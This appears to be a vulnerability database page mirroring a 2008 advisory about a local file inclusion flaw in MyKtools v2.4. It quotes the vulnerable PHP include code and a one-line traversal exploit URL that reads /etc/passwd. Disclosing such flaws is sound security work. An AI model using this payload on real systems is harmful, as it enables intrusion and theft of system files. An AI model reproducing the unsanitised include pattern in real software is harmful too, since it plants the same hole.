Lucene search

myktools-lfi.txt

🗓️ 27 Oct 2008 00:00:00Reported by X0rType

packetstorm🔗 packetstormsecurity.com👁 16 Views

Security vulnerability in MyKtools v2.4 update.php allows LFI attac

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`##############  
# Autor: x0r  
#  
# Email: evolutionteam.x0[at]gmail[dot]com  
#  
# Download: http://www.easy-script.com/scripts-dl/MyKtools-v2-4.zip  
#  
# Bug: LFI  
##############  
  
Bug:  
  
In \update.php  
  
// Include du fichier langue  
if ($_GET['langage'])  
{  
$langue = $_GET['langage'];  
include ("lang/".$langue.".php");  
}  
  
Exploit: \update.php?langage=../../../../../../etc/passwd%00  
  
p0wn3d Beby.  
  
-=EOF=-  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

27 Oct 2008 00:00Current

7.4High risk

Vulners AI Score7.4